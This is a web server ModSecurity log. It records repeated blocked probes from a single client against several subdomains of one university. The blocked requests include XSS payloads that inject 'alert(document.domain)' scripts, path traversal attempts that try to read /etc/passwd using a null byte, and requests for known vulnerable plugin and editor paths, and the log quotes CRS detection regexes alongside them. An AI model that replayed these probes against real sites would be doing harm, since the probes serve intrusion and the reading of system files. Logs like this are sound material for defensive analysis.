[Tue Aug 29 11:56:16.857504 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16cMCo-f0AAAqeFl0AAAAx"]
[Tue Aug 29 11:56:16.876143 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16cMCo-f0AAArC7i4AAAAW"]
[Tue Aug 29 11:56:17.091572 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAArC7jEAAAAW"]
[Tue Aug 29 11:56:17.133006 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAApHRmgAAAAP"]
[Tue Aug 29 11:56:17.152562 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq5@OsAAAAK"]
[Tue Aug 29 11:56:17.156784 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq2KgcAAAAE"]
[Tue Aug 29 11:56:17.157412 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAAq3a84AAAAI"]
[Tue Aug 29 11:56:17.180385 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAApHRmoAAAAP"]
[Tue Aug 29 11:56:17.189472 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAAqeFmQAAAAx"]
[Tue Aug 29 11:56:17.219589 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16ccCo-f0AAApHRmsAAAAP"]
[Tue Aug 29 11:56:17.566670 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAArB1zwAAAAV"]
[Tue Aug 29 11:56:17.582998 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAArC7jgAAAAW"]
[Tue Aug 29 11:56:17.639581 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAArC7joAAAAW"]
[Tue Aug 29 11:56:17.712592 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAArC7j0AAAAW"]
[Tue Aug 29 11:56:17.775059 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/php/demo.php"] [unique_id "ZO16ccCo-f0AAAq@sjYAAAAM"]
[Tue Aug 29 11:56:17.777657 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:serviceestimatekey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:serviceestimatekey: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/car1/estimateresult/result"] [unique_id "ZO16ccCo-f0AAArC7kAAAAAW"]
[Tue Aug 29 11:56:18.567142 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAq5@PkAAAAK"]
[Tue Aug 29 11:56:18.567220 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAApHRm0AAAAP"]
[Tue Aug 29 11:56:18.859795 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAAq@sjoAAAAM"]
[Tue Aug 29 11:56:18.938824 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16csCo-f0AAApXguYAAAAU"]
[Tue Aug 29 11:56:18.975582 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16csCo-f0AAApHRnAAAAAP"]
[Tue Aug 29 11:56:19.061357 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16c8Co-f0AAApHRnIAAAAP"]
[Tue Aug 29 11:56:19.073902 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16c8Co-f0AAAolK1sAAAAe"]
[Tue Aug 29 11:56:19.541472 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAq5@P4AAAAK"]
[Tue Aug 29 11:56:19.543019 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAolK1wAAAAe"]
[Tue Aug 29 11:56:19.651023 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAolK14AAAAe"]
[Tue Aug 29 11:56:19.667815 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ver. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ver: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php"] [unique_id "ZO16c8Co-f0AAAq@sj8AAAAM"]
